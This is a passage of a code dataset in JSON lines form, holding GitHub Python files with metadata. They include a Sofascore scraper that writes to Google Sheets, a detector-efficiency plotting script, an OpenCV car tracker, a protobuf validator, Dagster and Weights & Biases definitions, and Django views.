"line_number": 71, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QImage", "line_number": 75, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QImage.Format_RGB888", "line_number": 75, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QPixmap.fromImage", "line_number": 76, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 76, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 81, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 91, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 93, "usage_type": "call"}]}
+{"seq_id": "22213329995", "text": "import pandas as pd\r\nfrom bs4 import BeautifulSoup\r\nfrom selenium import webdriver\r\nimport re\r\nimport gspread\r\nfrom oauth2client.service_account import ServiceAccountCredentials\r\nimport time\r\n\r\ndef findBlockHeight(soup):\r\n height = soup.find('div', attrs={'class': 'ReactVirtualized__Grid__innerScrollContainer'})\r\n try:\r\n b = re.split(': |;', str(height['style']))\r\n l = b[b.index(' max-height') + 1]\r\n except:\r\n return 0\r\n return round(float(l[:len(l)-2])+800)\r\n\r\ndef findMatchesArray(h,a):\r\n array=[]\r\n while (h <= a):\r\n driver.execute_script(f\"window.scrollTo(0, {h});\")\r\n time.sleep(1)\r\n data = driver.page_source\r\n soup = BeautifulSoup(data, \"html.parser\")\r\n h += 800\r\n t = soup.find_all('a', attrs={'data-id': True})\r\n try:\r\n for i in t:\r\n tteams = i.find('div', attrs={\"class\": \"sc-hLBbgP eIlfTT\"})\r\n line = str()\r\n for elem in tteams:\r\n # print(elem.text.strip())\r\n line += elem.text.strip() + \":\"\r\n score = i.find_all('div',\r\n attrs={'class': \"sc-hLBbgP sc-eDvSVe fuUKnP bMwHQt sc-9199a964-2 kgwLqG score-box\"})\r\n if score != []:\r\n line += score[0].text[0] + '/' + score[1].text[0] + \":\"\r\n live = i.find('div', attrs={'color': 'sofaSingles.live'})\r\n if live != None:\r\n line += 'live'\r\n if line not in array:\r\n array.append(line)\r\n except:\r\n z = 0\r\n return array\r\n\r\n# Connect to Google Sheets\r\nscope = ['https://www.googleapis.com/auth/spreadsheets',\r\n \"https://www.googleapis.com/auth/drive\"]\r\n\r\ncredentials = ServiceAccountCredentials.from_json_keyfile_name(\"sofascore-parser.json\", scope)\r\nclient = gspread.authorize(credentials)\r\ngoogle_sh = client.create(\"Parser\")\r\ngoogle_sh.share('muradrmagomedov@gmail.com', perm_type='user', role='writer')\r\n\r\ndriver = webdriver.Chrome()\r\ndriver.get(\"https://www.sofascore.com/\")\r\ndata = driver.page_source\r\nsoup = BeautifulSoup(data, \"html.parser\")\r\nallmatches=[]\r\n#=======Find-all-urls-of sports=========================================================\r\nurls=[]\r\nx=[]\r\np=soup.find('div',attrs={'class':'sc-hLBbgP dRtNhU sc-12472a74-0 ijBjmq'}).find_all('a')\r\nfor elem in p:\r\n uurl='https://www.sofascore.com'+elem['href']\r\n if uurl not in urls and uurl!='https://www.sofascore.com/motorsport':\r\n urls.append(uurl)\r\n#=======end============================================================================\r\n#========Iterating through urls =======================================================\r\nfor elem in urls:\r\n driver.get(elem)\r\n time.sleep(1)\r\n data = driver.page_source\r\n soup = BeautifulSoup(data, \"html.parser\")\r\n#=======Find-matches-block-height=====================================================\r\n a = findBlockHeight(soup)\r\n h = 0\r\n#======================================================================================\r\n#========Iterating through page========================================================\r\n allmatches.append(findMatchesArray(h,a))\r\n\r\nfor i in range(len(allmatches)):\r\n for j in range(len(allmatches[i])):\r\n x.append(allmatches[i][j].split(':'))\r\n name=urls[i].split('/')[-1]\r\n if name=='':\r\n name='football'\r\n sheet=google_sh.add_worksheet(title=f'{name}',rows=1000,cols=4)\r\n df=pd.DataFrame(x)\r\n sheet.update(x)\r\n x = []\r\ngoogle_sh.del_worksheet(worksheet='Sheet1')\r\ndriver.close()\r\n", "repo_name": "aagadg/sofascore-parser", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3615, 
"program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "re.split", "line_number": 12, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 22, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 24, "usage_type": "call"}, {"api_name": "oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name", "line_number": 51, "usage_type": "call"}, {"api_name": "oauth2client.service_account.ServiceAccountCredentials", "line_number": 51, "usage_type": "name"}, {"api_name": "gspread.authorize", "line_number": 52, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 56, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 56, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 59, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 73, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 75, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 90, "usage_type": "call"}]}
+{"seq_id": "29702069407", "text": "import csv\r\nimport os\r\nimport math\r\nfrom datetime import datetime\r\nimport string\r\nimport numpy as np\r\nfrom matplotlib.backends.backend_pdf import PdfPages\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.stats import linregress\r\n\r\n\r\n#creates a list of all the csv files in the directory excluding the template\r\ncsvfiles = [os.path.join(root, name) for root, dirs, files in os.walk(\"./\") for name in files if name.endswith((\".csv\")) and name[-12:] != \"template.csv\"]\r\n\r\n\r\n#creates a dictionary associating each file with a list of its data\r\ndata = {}\r\nfor file in csvfiles:\r\n data[file] = []\r\n with open(file, 'rb') as csvfile:\r\n spamreader = csv.reader(csvfile, delimiter=' ', quotechar='|')\r\n for row in spamreader:\r\n data[file].append(row[0])\r\n for i in range(1,7):\r\n data[file][i] = int(data[file][i])\r\n for i in range(7,16):\r\n data[file][i] = float(filter(lambda x: x in string.printable, data[file][i]))\r\n\r\n\r\n#combines the data into a dictionary keyed with names representing a chart\r\n# with a value as a list of lists of the data for a particular graph\r\ncharts = {}\r\nfor item in data:\r\n if data[item][16] not in charts:\r\n charts[data[item][16]] = [data[item]]\r\n else:\r\n charts[data[item][16]].append(data[item])\r\n\r\n\r\n# processes the data and calculations outputting tuples (pairs) of results to plot\r\ndatatoplot = {}\r\nfor date in charts:\r\n datatoplot[date] = []\r\n #memoize some of the processing\r\n processed = {}\r\n def findexpectation(setofdata,processed):\r\n activity = setofdata[7] * math.e ** (-math.log(2) * time / setofdata[8])\r\n s = setofdata[11]\r\n r = setofdata[12]\r\n solidangle = s ** 2 / (4 * math.pi * r ** 2)\r\n expec = 37000 * activity * setofdata[10] * setofdata[13] * solidangle\r\n processed[(time, setofdata[10], setofdata[13], setofdata[11], setofdata[12])] = expec\r\n return expec\r\n\r\n for setofdata in charts[date]:\r\n end = datetime(setofdata[4], setofdata[5], setofdata[6])\r\n start = datetime(setofdata[1], setofdata[2], setofdata[3])\r\n difference = end - start\r\n time = (difference.days + difference.seconds / 86400) / 365.2425\r\n energy = setofdata[9]\r\n #check memoized data\r\n if (time, setofdata[10], setofdata[13], setofdata[11], setofdata[12]) in processed:\r\n expectation = processed[(time, setofdata[10], setofdata[13], setofdata[11], setofdata[12])]\r\n #in case not already calculated, then calculate\r\n else:\r\n expectation = findexpectation(setofdata, processed)\r\n experimental = setofdata[14]\r\n efficiency = experimental / expectation\r\n datatoplot[date].append((energy, efficiency))\r\n\r\n\r\n\r\n#outputs data and graphs onto a pdf\r\nwith PdfPages('data.pdf') as pdf:\r\n plotting = sorted(datatoplot)\r\n\r\n for i in range(len(datatoplot)):\r\n x = []\r\n y = []\r\n for tup in datatoplot[plotting[i]]:\r\n x.append(tup[0])\r\n y.append(tup[1])\r\n\r\n # make the scatter plot\r\n plt.scatter(x, y, s=10, alpha=.5, marker='o')\r\n # determine best fit line\r\n par = np.polyfit(x, y, 1, full=True)\r\n slope=par[0][0]\r\n intercept=par[0][1]\r\n xl = [min(x), max(x)]\r\n yl = [slope*xx + intercept for xx in xl]\r\n plt.plot(xl, yl, '-r')\r\n\r\n #analyze data\r\n slope, intercept, rcorrelation, pcorrelation, stderr = linregress(x, y)\r\n #output y=mx+b and r^2 onto graph pdf\r\n plt.text(0, .95, \"y = \" + str(slope) + \"x + \" + str(intercept) + \", r squared = \" + str(rcorrelation))\r\n\r\n #output data points as text (ordered pairs) onto 
graph\r\n texts = {}\r\n for j in range(len(datatoplot[plotting[i]])):\r\n plt.text(0, .85 - j*.1 , datatoplot[plotting[i]][j])\r\n\r\n #label axes\r\n plt.xlabel('energy')\r\n plt.ylabel('efficiency')\r\n \r\n #set limits of x and y axes\r\n plt.ylim([0, 1])\r\n plt.xlim([0, 1400])\r\n\r\n #plot title\r\n plt.title(str(plotting[i]))\r\n\r\n pdf.savefig() # saves the current figure into a pdf page\r\n plt.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "repo_name": "meiaalsup/urop-detector-efficiency", "sub_path": "ProcessEnergies.py", "file_name": "ProcessEnergies.py", "file_ext": "py", "file_size_in_byte": 4218, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 13, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 21, "usage_type": "call"}, {"api_name": "string.printable", "line_number": 27, "usage_type": "attribute"}, {"api_name": "math.e", "line_number": 47, "usage_type": "attribute"}, {"api_name": "math.log", "line_number": 47, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 50, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 56, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_pdf.PdfPages", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "numpy.polyfit", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "scipy.stats.linregress", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.text", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}]}
+{"seq_id": "18541708704", "text": "from datetime import datetime\nfrom dateutil import tz\nfrom shared.settings import TIMEZONE\n\ndef timezone_recovery(dt:datetime,timezone:str='') -> datetime:\n '''\n MongoDBから取得したISODate型はタイムゾーンが抜け落ちている。\n それの補正とタイムゾーンの付与を行ったdatetime型を返す。\n MongoDBから取得したISODate型の項目を使う場合、基本的に当関数を通じて使用すること。\n '''\n if timezone == '':\n UTC = tz.gettz(\"UTC\")\n dt = dt.replace(tzinfo=UTC)\n dt = dt.astimezone(TIMEZONE)\n else:\n UTC = tz.gettz(\"UTC\")\n dt = dt.replace(tzinfo=UTC)\n _ = tz.gettz(timezone)\n dt = dt.astimezone(_)\n return dt", "repo_name": "pubranko/BrownieAtelier", "sub_path": "app/shared/timezone_recovery.py", "file_name": "timezone_recovery.py", "file_ext": "py", "file_size_in_byte": 742, "program_lang": "python", "lang": "ja", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime", "line_number": 5, "usage_type": "name"}, {"api_name": "dateutil.tz.gettz", "line_number": 12, "usage_type": "call"}, {"api_name": "dateutil.tz", "line_number": 12, "usage_type": "name"}, {"api_name": "shared.settings.TIMEZONE", "line_number": 14, "usage_type": "argument"}, {"api_name": "dateutil.tz.gettz", "line_number": 16, "usage_type": "call"}, {"api_name": "dateutil.tz", "line_number": 16, "usage_type": "name"}, {"api_name": "dateutil.tz.gettz", "line_number": 18, "usage_type": "call"}, {"api_name": "dateutil.tz", "line_number": 18, "usage_type": "name"}]}
+{"seq_id": "21066190205", "text": "import numpy as np\r\nimport cv2\r\nimport time\r\n\r\n\r\ndef foofunction(x, y):\r\n a = []\r\n b = []\r\n c = []\r\n for i in range(0, len(x)):\r\n state = False\r\n for j in range(0, len(y)):\r\n if np.all(x[i] == y[j]):\r\n b.append(x[i])\r\n state = True\r\n if not state:\r\n a.append(x[i])\r\n\r\n for i in range(0, len(y)):\r\n state = False\r\n for j in range(0, len(x)):\r\n if np.all(x[j] == y[i]):\r\n state = True\r\n break\r\n if not state:\r\n c.append(y[i])\r\n return a, b, c\r\n\r\n\r\ndef labelformat(a):\r\n a = str(a)\r\n for i in range(len(a), 4):\r\n a = \"0\"+a\r\n return a\r\n\r\n\r\ncar_cascade = cv2.CascadeClassifier('haar_car.xml')\r\ninit = False\r\ncar_dataset = []\r\nframe_counter = 1\r\n\r\nfor i in range(1, 1701):\r\n img = cv2.imread(\"highway\\\\input\\\\in00\"+labelformat(i)+\".jpg\")\r\n car_dataset.append(img)\r\n\r\nall_cars = []\r\nid_vehicle = 1\r\n\r\nfor img in car_dataset:\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n cars = car_cascade.detectMultiScale(gray, 1.1, 5)\r\n new_cars = []\r\n # read new detected objects\r\n for (x, y, w, h) in cars:\r\n new_cars.append(detected_object(x, y, w, h, \"Vehicle TBD\"))\r\n\r\n for element in range(len(all_cars)):\r\n all_cars[element].draw = False\r\n\r\n if not init and len(cars) > 0:\r\n for element in new_cars:\r\n element.label = str(id_vehicle)\r\n id_vehicle += 1\r\n all_cars = new_cars.copy()\r\n init = True\r\n\r\n elif init:\r\n # delete elements with no TTL left and decrements TTL\r\n for element in range(len(all_cars)):\r\n # todel = []\r\n if all_cars[element].TTL <= 0:\r\n all_cars[element].draw = False\r\n else:\r\n all_cars[element].TTL -= 1\r\n all_cars[element].draw = False\r\n # Determin object correspendence\r\n # compute xxo as [a,b] where a is the index of the new object in new_cars and o is the index of the object in all_cars\r\n if init and len(new_cars) > 0:\r\n xxo = []\r\n for new_element in range(len(new_cars)):\r\n distance = []\r\n distance_indexes = []\r\n for old_element in range(len(all_cars)):\r\n distance.append(new_cars[new_element].distance(\r\n all_cars[old_element]))\r\n distance_indexes.append([new_element, old_element])\r\n xxo.append(distance_indexes[np.argmin(distance)])\r\n # Same thing as precedent , but this time we inverse the loop\r\n oxo = []\r\n for old_element in range(len(all_cars)):\r\n distance = []\r\n distance_indexes = []\r\n for new_element in range(len(new_cars)):\r\n distance.append(all_cars[old_element].distance(\r\n new_cars[new_element]))\r\n distance_indexes.append([new_element, old_element])\r\n oxo.append(distance_indexes[np.argmin(distance)])\r\n # now we search for the intersection of xxo and oxo :\r\n # 1- if an element is common , the we update it's position in all_cars\r\n # 2 - if an element belongs only to xxo , then it's a new element\r\n # 3 - if an element belongs onlt to oxo , then we don't render it\r\n only_x, common, only_o = foofunction(xxo, oxo)\r\n # case 1 :\r\n for common_element in common:\r\n all_cars[common_element[1]].TTL = 5\r\n all_cars[common_element[1]].x = new_cars[common_element[0]].x\r\n all_cars[common_element[1]].y = new_cars[common_element[0]].y\r\n all_cars[common_element[1]\r\n ].centroid = new_cars[common_element[0]].centroid\r\n all_cars[common_element[1]].draw = True\r\n # case 2 :\r\n for only_x_element in only_x:\r\n new_cars[only_x_element[0]].label = str(id_vehicle)\r\n new_cars[only_x_element[0]].draw = True\r\n id_vehicle += 1\r\n all_cars = list(all_cars)\r\n 
all_cars.append(new_cars[only_x_element[0]])\r\n # case 3 :\r\n for only_o_element in only_o:\r\n all_cars[only_o_element[1]].x = 9999\r\n all_cars[only_o_element[1]].y = 9999\r\n all_cars[only_o_element[1]].centroid = (9999, 9999)\r\n all_cars[only_o_element[1]].draw = False\r\n\r\n showdown = all_cars\r\n for element in showdown:\r\n element.history.append(element.centroid)\r\n print(element.history)\r\n if element.draw:\r\n startpoint = element.history[0]\r\n endpoint = element.history[-1]\r\n vector = (endpoint[0]-startpoint[0], endpoint[1]-startpoint[1])\r\n enddraw = (element.centroid[0]+vector[0],\r\n element.centroid[1]+vector[1])\r\n cv2.rectangle(img, (element.x, element.y), (element.x +\r\n element.w, element.y+element.h), (0, 0, 255), 2)\r\n cv2.putText(img, element.label, (element.x, element.y+element.h+50),\r\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2, cv2.LINE_AA)\r\n try:\r\n cv2.arrowedLine(img, element.centroid, enddraw, (255, 0, 0), 2)\r\n except:\r\n pass\r\n for i in element.history:\r\n cv2.circle(img, i, 2, (0, 255, 255), -1)\r\n cv2.imshow(\"CAR TRACKING\", img)\r\n time.sleep(0.01)\r\n frame_counter += 1\r\n # Stop if 'q' key is pressed\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n", "repo_name": "nazimbandoui/car_tracking", "sub_path": "track.py", "file_name": "track.py", "file_ext": "py", "file_size_in_byte": 5552, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.all", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.CascadeClassifier", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 50, "usage_type": "attribute"}, {"api_name": "numpy.argmin", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 97, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 135, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 137, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 138, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 138, "usage_type": "attribute"}, {"api_name": "cv2.arrowedLine", "line_number": 140, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 144, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 145, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 146, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 149, "usage_type": "call"}]}
+{"seq_id": "37864710275", "text": "import base64\nimport math\nfrom importlib import import_module\n\nfrom google.protobuf import descriptor\nfrom google.protobuf.json_format import (_FLOAT_TYPES, _INFINITY, _INT64_TYPES,\n _NAN, _NEG_INFINITY, Parse)\n\n\ndef validate_protobuf(dataset_path, message):\n \"\"\"Check if a protobuf file is DGP compliant. Throws exceptions if invalid.\n\n Parameters\n ----------\n dataset_path: string\n Path to the dataset file (.json) to be validated.\n message: string\n Target message name to be validated (dgp.proto.dataset.Dataset).\n \"\"\"\n modules = message.split('.')\n assert len(modules) >= 4, '{} needs to be at least 4-tuple valued'.format(message)\n try:\n top_module = modules[0]\n proto, message_name = modules[-2], modules[-1]\n compiled_proto_module = '{}_pb2'.format(proto)\n module_object = import_module(\"{}.{}\".format('.'.join(modules[:-2]), compiled_proto_module))\n target_message = getattr(module_object, message_name)\n except Exception as e:\n raise ValueError('Failed to parse {} proto message: {}'.format(message, e.message))\n\n if not dataset_path.endswith((\".json\", \".pb\", \".prb\")):\n raise IOError(\"{} is not a supported file format. Supported file extenstions: .json, .pb, .prb\")\n\n is_json = dataset_path.endswith(\".json\")\n with open(dataset_path, \"r\" if is_json else \"rb\") as dataset_file:\n if is_json:\n message = Parse(dataset_file.read(), target_message())\n else:\n message = target_message()\n target_message().ParseFromString(dataset_file.read())\n\n schema = getattr('{}.validation', top_module, 'SCHEMA_VALIDATION')\n validate_message(message, schema)\n\n print(\"{} is valid\".format(dataset_path))\n\n\ndef validate_message(message, schema):\n \"\"\"Validate a protobuf message instance. 
Throws exception if a field value does not match the schema.\n Parameters\n ----------\n message: protobuf message instance\n The protocol buffers message instance to be validated.\n schema: dict\n A dictionary containing field names to NamedTuples of content schema.\n \"\"\"\n for field, value in message.ListFields():\n if _is_map_entry(field):\n v_field = field.message_type.fields_by_name['value']\n for key in value:\n _validate_field(v_field, value[key], schema)\n elif field.label == descriptor.FieldDescriptor.LABEL_REPEATED:\n for v in value:\n _validate_field(field, v, schema)\n else:\n _validate_field(field, value, schema)\n\n\ndef _is_map_entry(field):\n \"\"\"Returns True if the field is a map entry, vice versa.\n Parameters\n ----------\n field: FieldDescriptor\n Field.\n\n Returns\n -------\n exists: bool\n True if the filed is a map entry.\n \"\"\"\n return (\n field.type == descriptor.FieldDescriptor.TYPE_MESSAGE and field.message_type.has_options\n and field.message_type.GetOptions().map_entry\n )\n\n\ndef _validate_content(full_name, content, name_to_schema):\n \"\"\"Validate a single field content if the field name is in the auxiliary schema.\n Parameters\n ----------\n full_name: str\n Full name of the field.\n content: Any\n Field value.\n \"\"\"\n if full_name in name_to_schema:\n schema = name_to_schema[full_name]\n schema.validate(full_name, content)\n\n\ndef _validate_field(field, value, schema):\n \"\"\"Traverse fields, convert field value and call _validate_content to check\n if contents satisfy the auxiliary schema.\n Parameters\n ----------\n field: FieldDescriptor\n Field.\n value: Any\n Value.\n schema: Dict\n Auxiliary content schema imported from dgp.proto.auxiliary_schema\n \"\"\"\n if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:\n return validate_message(value, schema)\n\n field_value = value\n if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_ENUM:\n enum_value = field.enum_type.values_by_number.get(value, None)\n if enum_value is not None:\n field_value = enum_value.name\n elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_STRING:\n if field.type == descriptor.FieldDescriptor.TYPE_BYTES:\n field_value = base64.b64encode(value).decode('utf-8')\n else:\n field_value = value\n elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_BOOL:\n field_value = bool(value)\n elif field.cpp_type in _INT64_TYPES:\n field_value = str(value)\n elif field.cpp_type in _FLOAT_TYPES:\n if math.isinf(value):\n field_value = _NEG_INFINITY if value < 0.0 else _INFINITY\n if math.isnan(value):\n field_value = _NAN\n\n _validate_content(field.full_name, field_value, schema)\n", "repo_name": "morsingher/sfm_to_mvs", "sub_path": "ddad/dgp/utils/validator.py", "file_name": "validator.py", "file_ext": "py", "file_size_in_byte": 4862, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "importlib.import_module", "line_number": 26, "usage_type": "call"}, {"api_name": "google.protobuf.json_format.Parse", "line_number": 37, "usage_type": "call"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 62, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 62, "usage_type": "name"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 82, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 82, "usage_type": "name"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", 
"line_number": 113, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 113, "usage_type": "name"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 117, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 117, "usage_type": "name"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 121, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 121, "usage_type": "name"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 122, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 122, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 123, "usage_type": "call"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 126, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 126, "usage_type": "name"}, {"api_name": "google.protobuf.json_format._INT64_TYPES", "line_number": 128, "usage_type": "name"}, {"api_name": "google.protobuf.json_format._FLOAT_TYPES", "line_number": 130, "usage_type": "name"}, {"api_name": "math.isinf", "line_number": 131, "usage_type": "call"}, {"api_name": "google.protobuf.json_format._NEG_INFINITY", "line_number": 132, "usage_type": "name"}, {"api_name": "google.protobuf.json_format._INFINITY", "line_number": 132, "usage_type": "name"}, {"api_name": "math.isnan", "line_number": 133, "usage_type": "call"}, {"api_name": "google.protobuf.json_format._NAN", "line_number": 134, "usage_type": "name"}]}
+{"seq_id": "9881877677", "text": "from dagster import (\n Definitions,\n StringSource,\n load_assets_from_package_module,\n make_values_resource,\n)\nfrom dagster_wandb import wandb_artifacts_io_manager, wandb_resource\n\nfrom . import assets\nfrom .ops.launch.run_launch_agent import run_launch_agent_example\nfrom .ops.launch.run_launch_job import run_launch_job_example\nfrom .ops.partitioned_job import partitioned_job_example\nfrom .ops.simple_job import simple_job_example\n\nwandb_config = make_values_resource(\n entity=StringSource,\n project=StringSource,\n)\n\ndefs = Definitions(\n assets=load_assets_from_package_module(assets),\n jobs=[\n simple_job_example,\n partitioned_job_example,\n run_launch_agent_example,\n run_launch_job_example,\n ],\n resources={\n \"wandb_config\": wandb_config.configured(\n {\n \"entity\": {\"env\": \"WANDB_ENTITY\"},\n \"project\": {\"env\": \"WANDB_PROJECT\"},\n }\n ),\n \"wandb_resource\": wandb_resource.configured({\"api_key\": {\"env\": \"WANDB_API_KEY\"}}),\n \"io_manager\": wandb_artifacts_io_manager.configured({\"cache_duration_in_minutes\": 60}),\n },\n)\n", "repo_name": "dagster-io/dagster", "sub_path": "examples/with_wandb/with_wandb/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1159, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8986, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dagster.make_values_resource", "line_number": 15, "usage_type": "call"}, {"api_name": "dagster.StringSource", "line_number": 16, "usage_type": "name"}, {"api_name": "dagster.StringSource", "line_number": 17, "usage_type": "name"}, {"api_name": "dagster.Definitions", "line_number": 20, "usage_type": "call"}, {"api_name": "dagster.load_assets_from_package_module", "line_number": 21, "usage_type": "call"}, {"api_name": "ops.simple_job.simple_job_example", "line_number": 23, "usage_type": "name"}, {"api_name": "ops.partitioned_job.partitioned_job_example", "line_number": 24, "usage_type": "name"}, {"api_name": "ops.launch.run_launch_agent.run_launch_agent_example", "line_number": 25, "usage_type": "name"}, {"api_name": "ops.launch.run_launch_job.run_launch_job_example", "line_number": 26, "usage_type": "name"}, {"api_name": "dagster_wandb.wandb_resource.configured", "line_number": 35, "usage_type": "call"}, {"api_name": "dagster_wandb.wandb_resource", "line_number": 35, "usage_type": "name"}, {"api_name": "dagster_wandb.wandb_artifacts_io_manager.configured", "line_number": 36, "usage_type": "call"}, {"api_name": "dagster_wandb.wandb_artifacts_io_manager", "line_number": 36, "usage_type": "name"}]}
+{"seq_id": "14206480497", "text": "#encoding=utf-8\n\nfrom django.shortcuts import render\nfrom blogs.models import Tag, Category, BaseModel\nfrom common.helpers import paged_items, ok_json\nfrom common.pc_m import judge_pc_or_mobile\nfrom tools.models import Tools\n\n\ndef tools(request):\n nav_bar = \"tools\"\n tools_list = Tools.objects.filter(is_active=True).order_by(\"-id\")\n user_agt = judge_pc_or_mobile(request.META.get(\"HTTP_USER_AGENT\"))\n if user_agt is False:\n tools_list = paged_items(request, tools_list)\n return render(request, 'web/pages/tools/tools.html', locals())\n else:\n tools_list = paged_items(request, tools_list)\n return render(request, 'web/pages/tools/tools.html', locals())\n\n\ndef tools_detail(request, tid):\n nav_bar = \"tools\"\n tool_detail = Tools.objects.filter(id=tid).first()\n tool_detail.views += 1\n tool_detail.save()\n user_agt = judge_pc_or_mobile(request.META.get(\"HTTP_USER_AGENT\"))\n if user_agt is False:\n return render(request, 'web/pages/tools/tools_detail.html', locals())\n else:\n return render(request, 'web/pages/tools/tools_detail.html', locals())", "repo_name": "gingernet/scoinfamily", "sub_path": "tools/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1119, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tools.models.Tools.objects.filter", "line_number": 12, "usage_type": "call"}, {"api_name": "tools.models.Tools.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "tools.models.Tools", "line_number": 12, "usage_type": "name"}, {"api_name": "common.pc_m.judge_pc_or_mobile", "line_number": 13, "usage_type": "call"}, {"api_name": "common.helpers.paged_items", "line_number": 15, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": 